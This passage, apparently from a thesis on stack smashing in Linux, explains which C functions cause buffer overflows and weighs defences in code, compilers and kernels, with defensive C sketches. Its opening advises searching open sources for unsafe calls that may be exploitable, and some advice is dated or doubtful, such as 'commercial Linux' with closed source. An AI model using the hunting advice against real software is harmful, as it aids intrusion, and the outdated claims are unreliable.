As stated earlier, buffer overflows are the result of stuffing more information into a buffer than it is meant to hold. Since C does not have any built-in bounds checking, overflows often manifest themselves as writing past the end of a character array. The standard C library provides a number of functions for copying or appending strings that perform no boundary checking. They include strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate on null-terminated strings and do not check for overflow of the receiving string. gets() is a function that reads a line from stdin into a buffer until either a terminating newline or EOF. It performs no checks for buffer overflows. The scanf() family of functions can also be a problem if you are matching a sequence of non-white-space characters (%s), or matching a non-empty sequence of characters from a specified set (%[]), when the array pointed to by the char pointer is not large enough to accept the whole sequence of characters and you have not defined the optional maximum field width.
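The optional maximum field width mentioned for the scanf() family can be illustrated briefly. This is a sketch under stated assumptions: the function name read_word() and the buffer size WORD_SIZE are hypothetical, and sscanf() is used instead of scanf() only so that the input can be supplied as a string.

```c
#include <assert.h>
#include <stdio.h>

#define WORD_SIZE 16   /* hypothetical buffer size chosen for the example */

/* Hypothetical helper: extracts one whitespace-delimited word from input.
 * The width in "%15s" caps the number of characters stored at
 * WORD_SIZE - 1, and sscanf() then appends the terminating NUL.
 * Returns 1 if a word was read, 0 otherwise. */
int read_word(const char *input, char word[WORD_SIZE])
{
    assert(input != NULL && word != NULL);
    return sscanf(input, "%15s", word) == 1;
}
```

With a plain "%s" the same call would copy the whole word regardless of the size of the destination array.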

If the target of any of these functions is a buffer of static size, and its other argument was somehow derived from user input, there is a good possibility that you might be able to exploit a buffer overflow. Another common programming construct is the use of a while loop to read one character at a time into a buffer from stdin or some file until the end of line, end of file, or some other delimiter is reached. This type of construct usually uses one of these functions: getc(), fgetc(), or getchar(). If there are no explicit checks for overflows in the while loop, such programs are easily exploited.
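For contrast, the character-at-a-time loop can carry the explicit overflow check that the vulnerable versions lack. The sketch below is one possible shape, not code from any particular program; the name read_line_bounded() and the choice to discard excess characters are assumptions.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: reads one line from fp into buf, which has room
 * for size bytes. At most size - 1 characters are stored, the result is
 * always NUL-terminated, and the rest of an over-long line is discarded.
 * Returns the number of characters stored. */
size_t read_line_bounded(FILE *fp, char *buf, size_t size)
{
    size_t n = 0;
    int c;

    assert(fp != NULL && buf != NULL && size > 0);
    while ((c = fgetc(fp)) != EOF && c != '\n') {
        if (n + 1 < size)          /* the explicit overflow check */
            buf[n++] = (char)c;
        /* otherwise drop the character instead of writing past the end */
    }
    buf[n] = '\0';
    return n;
}
```

Removing the if test turns this back into the exploitable construct described above, since the loop would then write as many characters as the input supplies.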

To conclude, grep is your friend. The sources for free operating systems and their utilities are readily available. This fact becomes quite interesting once you realize that many commercial operating system utilities were derived from the same sources as the free ones.

Stack Smashing Prevention

A centralized or decentralized approach can be taken to avoid stack smashing security vulnerabilities. To do so, changes must be implemented in the privileged programs themselves, in the C programming language compilers, or in the operating system kernel. A centralized approach involves modification of system libraries and/or an operating system kernel, while a decentralized approach involves the modification of privileged programs and/or C programming language compilers. Of these two basic approaches, a decentralized approach is more immediately expensive with respect to manpower and workload, but cheaper in the long term, providing a stable, long-lasting solution. A centralized approach is cheaper in the short term with respect to manpower and workload, but is nearly impossible to implement as a long-term solution.

Program modification

To effectively fix a defective SUID root program, a number of modifications can be made to the program’s source code to avoid stack smashing vulnerabilities. Standard C byte copy or concatenation functions are crucial in most buffer overflow exploits. A list of vulnerable function calls in the C programming language, with a suitable replacement function where one is available, is as follows:

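function      suitable replacement
gets()        fgets()
sprintf()     (none listed)
strcat()      strncat()
strcpy()      strncpy()
streadd()     (none listed)
strecpy()     (none listed)
strtrns()     (none listed)
index()       (none listed)
fscanf()      (none listed)
scanf()       (none listed)
sscanf()      (none listed)
vsprintf()    (none listed)
realpath()    (none listed)
getopt()      (none listed)
getpass()     (none listed)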
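The length-limited replacements in the list still need care, because strncpy() does not write a terminating NUL when the source fills the whole limit. The following sketch wraps strncpy() and strncat() so that the destination is always terminated; the wrapper names bounded_copy() and bounded_append() are hypothetical and not part of the C library.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical wrapper: copies src into dst (capacity size), truncating
 * if necessary, and always terminates the result. */
void bounded_copy(char *dst, size_t size, const char *src)
{
    assert(dst != NULL && src != NULL && size > 0);
    strncpy(dst, src, size - 1);
    dst[size - 1] = '\0';   /* strncpy() omits the NUL when src is too long */
}

/* Hypothetical wrapper: appends src to the string already in dst
 * (capacity size), truncating if necessary. */
void bounded_append(char *dst, size_t size, const char *src)
{
    size_t used;

    assert(dst != NULL && src != NULL && size > 0);
    used = strlen(dst);
    if (used < size - 1)
        /* strncat() writes at most the given count plus one NUL byte */
        strncat(dst, src, size - 1 - used);
}
```

Silent truncation is itself a design choice; a program that must not lose data would report an error instead.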

In general, functions that return a pointer to a result in static storage can be used in stack smashing exploits. Likewise, standard C function calls that copy strings without checking their length are insecure. Some vulnerable functions have suitable ‘drop in’ replacements; others do not. Whenever possible, alternative functions must be used to help ensure that privileged code is not susceptible to stack smashing exploits. In addition to using suitable replacements for vulnerable functions, shell environment pointers and excessive command line arguments also need to be checked for invalid data. Recall that stack smashers are creative and often hide shell code and other crucial exploit information in excessive command line arguments or environment variables.

Thus, securing source code must be a comprehensive process to be effective, and all avenues of unauthorized input must be inspected and properly terminated if invalid.
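Checking a command line argument or environment value before it is used might look like the sketch below. The function name input_is_acceptable() and the policy it applies (a length limit plus printable characters only) are assumptions chosen for illustration; a real program would pick limits that match what each input is supposed to contain.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Hypothetical check: returns 1 when value is at most max_len characters
 * long and consists only of printable characters, otherwise returns 0.
 * A NULL value is rejected. */
int input_is_acceptable(const char *value, size_t max_len)
{
    size_t i;

    assert(max_len > 0);
    if (value == NULL)
        return 0;
    for (i = 0; value[i] != '\0'; i++) {
        if (i >= max_len)
            return 0;                           /* longer than allowed */
        if (!isprint((unsigned char)value[i]))
            return 0;                           /* raw, non-printable byte */
    }
    return 1;
}
```

A privileged program could apply such a check to each argv[] entry and to every getenv() result it relies on, and refuse to continue when the check fails.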

Commercial programs such as CenterLine Software’s CodeCenter or Pure Atria’s Purify, and noncommercial programs such as Brian Marick’s GCT or Bruce Perens’s Electric Fence, can be used to assist programmers in locating buffer overflows and illegal function operations that standard C compilers do not look for. However, programs such as these can only catch overflow bugs reactively, not proactively: a test case must exist which provokes the stack smashing hole. On the other hand, many of these programs can offer more information than standard Linux facilities while investigating a program’s abnormal memory operations.

As C debugging tools, these programs may offer more than simple ‘segmentation violation’ messages. However, it is important to remember that these programs are designed to remove bugs and do not specialize in security. Furthermore, these programs do not consider the current or future filesystem permissions of the program. The same battery of tests is applied to a program whether it runs as a privileged user or not.

In summary, automated debugging tools are useful in correcting known vulnerabilities; however, they cannot detect future vulnerabilities and are limited as security tools. Security and stability are synonymous. Programs that use secure functions and accept less bad input data are not only more secure, but run more efficiently and build faster. By changing existing code and writing new code with security in mind, both privileged code and nonprivileged code share the benefits. Recalling the ease with which privileged program execution can be transferred, it is important to note that privileged code often trusts nonprivileged code. Privileged processes may assume that all binaries, privileged and nonprivileged, are to be trusted.

By using more secure programming practices on all Linux system code, every segment of the code base is strengthened. Security and robustness both involve thinking about the ranges of allowable inputs and responses, and limiting them so undesirable responses are not produced.

Modifying the code is the only near-foolproof method of ensuring that SUID root programs are not exploited. Not only can this avoid buffer overflows in programs, but it also produces faster, more efficient, and more robust code in the nonsecurity areas of the operating system. The OpenBSD project has paid special attention to this.

The disadvantage of manually modifying all affected programs is obvious: all subject programs must be checked by hand and recompiled. Thousands of lines of source code must have all function calls and UID execution privileges examined and changed, if necessary. In the free operating system arena, systems such as Linux, FreeBSD, OpenBSD and NetBSD have full source code distributions available for public use. Complete copies of the operating system kernel and system utilities may be downloaded and modified, allowing anyone to fix stack smashing vulnerabilities.

In contrast, commercial Linux operating systems have limited source code availability, if any. As the chief decentralized approach to avoiding stack smashing holes in the Linux operating system, global code auditing is the most expensive in terms of necessary manpower and workload, but can offer the most in long-term reliability and security.

Compiler modifications

An additional decentralized approach to preventing stack smashing vulnerabilities is to modify how the C compiler in a given Linux operating system treats vulnerable functions. However, it is important to note that, in most cases, these modifications to the C programming language are not trivial and involve fundamental changes to the concepts behind the language.

A simple approach of this nature involves modifications to the C compiler which do not affect the C programming language. For example, the BSDI and OpenBSD operating systems’ compilers generate warning messages when compiling a program which uses “dangerous” function calls. Although a warning does not by itself remove a vulnerability, the main benefit of an approach such as this is that it encourages secure programming without changing the code or its performance.

A median approach of this nature involves slight modifications that affect only the “dangerous” functions in the C library, which would perform a stack integrity check before referencing the appropriate return value. In one proposed patch to the FreeBSD operating system, if the integrity check fails, the function simply prints a warning message and exits the affected program.
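The idea of an integrity check performed after a copy and before returning can be imitated in portable C with a guard value. The sketch below is only a simulation under stated assumptions: the names copy_and_check(), BUF_SIZE and GUARD are hypothetical, the "frame" is an ordinary byte array rather than a real stack frame, and the function returns an error code where the patch described above would print a warning and exit.

```c
#include <assert.h>
#include <string.h>

#define BUF_SIZE 16              /* hypothetical size of the simulated buffer */
#define GUARD    0xC3A5F00DUL    /* hypothetical guard value */

/* Simulated frame: the first BUF_SIZE bytes stand for a local buffer and
 * the bytes after it hold a guard value, in the position where saved
 * control data would sit. Copies n bytes from src without checking them
 * against BUF_SIZE, then verifies the guard.
 * Returns 0 if the guard is intact, -1 if it was overwritten. */
int copy_and_check(const char *src, size_t n)
{
    unsigned char frame[BUF_SIZE + sizeof(unsigned long)];
    unsigned long guard = GUARD;
    unsigned long after;

    assert(src != NULL && n <= sizeof frame);   /* keeps the simulation in bounds */
    memcpy(frame + BUF_SIZE, &guard, sizeof guard);
    memcpy(frame, src, n);                      /* stand-in for an unchecked copy */
    memcpy(&after, frame + BUF_SIZE, sizeof after);
    return after == GUARD ? 0 : -1;
}
```

Copying up to BUF_SIZE bytes leaves the guard untouched, while a single extra byte changes it and is reported.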

The main disadvantage to this approach is that all dangerous functions would suffer a significant performance penalty, and like the previous approach, this modification does not take into account autonomous functions defined by the programmer, because of its implementation in the system libraries. An additional drawback to this approach is that the code necessary for checking the stack must be written in assembler, and is thus not portable to multiple architectures.

An extreme approach to solving the problem with the compiler involves implementing bounds checking in the C programming language. This is possibly the most dangerous solution to the stack smashing problem, because it violates the C programming language’s simplicity, efficiency, and flexibility. One approach used in implementing this involves modifying the representation of pointers in the language to include three items: the pointer itself, and the lower and upper bounds of the pointer’s address space.

By giving the compiler the additional upper and lower bound information, it would then be trivial to do bounds checking before byte copy functions. Despite this benefit, this approach to implementing bounds checking has the following disadvantages: the execution time of the resulting code increases by a factor of ten or more [5], register allocation becomes more expensive by a factor of 3:1, new versions of all compiled system libraries and system calls must be provided, and code that interfaces with the hardware directly may be completely incompatible or require special attention.
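The three-item pointer representation can be imitated by hand in ordinary C to show what such a compiler would track. This is a sketch only: struct bounded_ptr, make_bounded() and checked_store() are hypothetical names, and a bounds-checking compiler would generate the equivalent checks automatically instead of requiring explicit calls.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical "fat pointer": the pointer itself plus its bounds. */
struct bounded_ptr {
    char *ptr;    /* current position */
    char *low;    /* first valid byte */
    char *high;   /* one past the last valid byte */
};

/* Builds a bounded pointer covering size bytes starting at base. */
struct bounded_ptr make_bounded(char *base, size_t size)
{
    struct bounded_ptr bp;

    assert(base != NULL);
    bp.ptr = base;
    bp.low = base;
    bp.high = base + size;
    return bp;
}

/* Stores c at bp->ptr + offset only when that byte lies below the upper
 * bound. Returns 0 on success, -1 when the store is refused. */
int checked_store(struct bounded_ptr *bp, size_t offset, char c)
{
    size_t available;

    assert(bp != NULL && bp->low <= bp->ptr && bp->ptr <= bp->high);
    available = (size_t)(bp->high - bp->ptr);
    if (offset >= available)
        return -1;
    bp->ptr[offset] = c;
    return 0;
}
```

Carrying two extra addresses with every pointer, and testing them on every access, gives some intuition for the run-time and register costs listed above.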

A unique approach of this kind modifies the compiler to perform the same type of bounds checking without modifying the representation of pointers. Furthermore, it provides options to turn the bounds checking mode on or off in a given program.

Only one pointer is valid for a given region, and one can check whether a pointer arithmetic expression is valid by finding its base pointer’s storage region. The expression’s result is then checked to ensure that it points to the same storage region.
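The region lookup can be sketched as a small table of known storage regions. Everything named here (struct region, find_region(), arithmetic_is_valid()) is hypothetical, and a linear search over an array is an assumption made for brevity; the sketch shows only the check itself, not how a compiler would register regions or instrument expressions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical record of one storage region known to the checker. */
struct region {
    uintptr_t base;   /* address of the first byte */
    size_t    size;   /* number of bytes in the region */
};

/* Returns the region that contains addr, or NULL if none does. */
const struct region *find_region(const struct region *table, size_t count,
                                 uintptr_t addr)
{
    size_t i;

    assert(table != NULL);
    for (i = 0; i < count; i++)
        if (addr >= table[i].base && addr - table[i].base < table[i].size)
            return &table[i];
    return NULL;
}

/* Returns 1 when base_ptr + delta stays inside the region that contains
 * base_ptr (one past the end is allowed, as in C), otherwise 0. */
int arithmetic_is_valid(const struct region *table, size_t count,
                        const void *base_ptr, ptrdiff_t delta)
{
    uintptr_t addr = (uintptr_t)base_ptr;
    const struct region *r = find_region(table, count, addr);
    ptrdiff_t offset;

    if (r == NULL)
        return 0;
    offset = (ptrdiff_t)(addr - r->base) + delta;
    return offset >= 0 && (size_t)offset <= r->size;
}
```

Because the check depends only on the table, ordinary pointers keep their usual representation, which is the point of this variant.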

Despite semifavorable performance statistics, and in addition to the general risk involved in modifying the C language at this level, this modification involves patching and recompiling the existing C compiler and its libraries. Furthermore, all previously compiled binaries must be deleted and recompiled with the new libraries. Once this is done, all binaries on the system will execute with this patch in effect. In conclusion, modifying the C language or the C compiler to limit stack smashing opportunities often involves modifying the C language at a nontrivial level.

Additionally, the most complex and comprehensive solutions of this nature, despite their long-term centralization, still remain largely decentralized and difficult to implement and test in a reasonable amount of time. The more trivial modifications of this nature degenerate simply into compiler warning messages that can only encourage the programmer to modify the program manually.

CPU/OS kernel stack execution privilege

The most centralized approach to preventing some stack smashing vulnerabilities involves modifying an operating system’s kernel segment limit such that it does not cover the actual stack space. This approach effectively removes the kernel’s stack execution permission. It has a fundamental advantage over other countermeasures: as the most centralized method of limiting stack smashing vulnerabilities, it requires no recompilation of C libraries or the actual compiler; only the operating system kernel need be recompiled. A practical implementation of this concept on the Linux operating system is described below. This description touches on the details of implementation as well as some of the problems.

To remove stack execution privilege in Linux, the operating system’s dynamically allocated stack memory is marked as nonexecutable. A program started under such a kernel would have its stack pages also marked nonexecutable. Stack smashing exploits depend on an executable stack when returning into a memory address which executes an interactive shell. By removing this functionality from the system, some stack smashing vulnerabilities can be stopped.

However, signal handler returns in the Linux operating system require an executable stack. Signal handlers are absolutely crucial in an operating system, so a temporarily executable stack for signal handlers must be implemented. As a result, buffer overflows in signal handlers would still be possible using this temporarily executable stack.

Changing the kernel stack execution permissions would stop most SUID buffer overflows, excluding those involving signal handlers. A system with a nonexecutable stack also hinders LISP and Objective C development efforts, and functional languages might be affected as well. Furthermore, every program already contains code that performs fundamental operations such as saving and restoring values from CPU registers and performing system calls, and an exploit could redirect execution into that existing code rather than into code placed on the stack.

In contrast to the stack smashing exploits currently available, an attack such as this would be impossible to prevent by changing the stack execution privilege. In other words, removing the stack execution permission only prevents today’s stack smashing exploits from working properly. As exploits become more sophisticated, stack execution bits may have little or no relevance to the exploit. As an aside, this type of patch can also be implemented in system CPU hardware.

New system architectures could simply have multiple stacks: one for call frames, and one for automatic storage.

In conclusion, by removing stack execution from the system kernel, one can attempt to stop the stack smashing problem at the source. However, this approach suffers in implementation because the necessary code is nonportable, and because standard compiler functions and operating system signal handling behavior are modified and may become unpredictable. In addition, this approach is not proven to stop more sophisticated stack smashing exploits.


Chapter 6. Conclusion

Stack smashing security exploits have become commonplace on Linux machines as a means to gain access to privileged resources. Based on this study, one can see how an unprivileged user can obtain privileged user permissions by combining standard operations and conditions of Linux and the C programming language. Furthermore, given the number of privileged programs that exist in today’s standard Linux distributions, an overflow exploit could be constructed for any one or more of them.

In spite of the prevalence of stack smashing, a number of things can be done to prevent most stack smashing vulnerabilities. As the level of awareness of stack smashing exploits increases, Linux vendors, programmers, system administrators and users alike are educating each other. System administrators can implement various configuration methods to lower the possibility of stack smashing exploits. Linux vendors can do their part by making a commitment to be very cautious with the privileged binaries installed by default on their specific Linux distribution.

Lastly, perhaps the most effective solution can come from programmers who write privileged code. As standards evolve and are accepted for coding safer privileged programs and creating more secure operating systems, programmers can develop more robust code which is less susceptible to stack smashing. With the cooperation of many people in different parts of the Linux community, stack smashing security vulnerabilities can be defeated.


Appendix A. References

• PC Assembly Book by Paul A. Carter

• Smashing the Stack for Fun and Profit by Aleph One, Phrack Magazine

• Microprocessors and Interfacing: Programming and Hardware by Douglas V. Hall
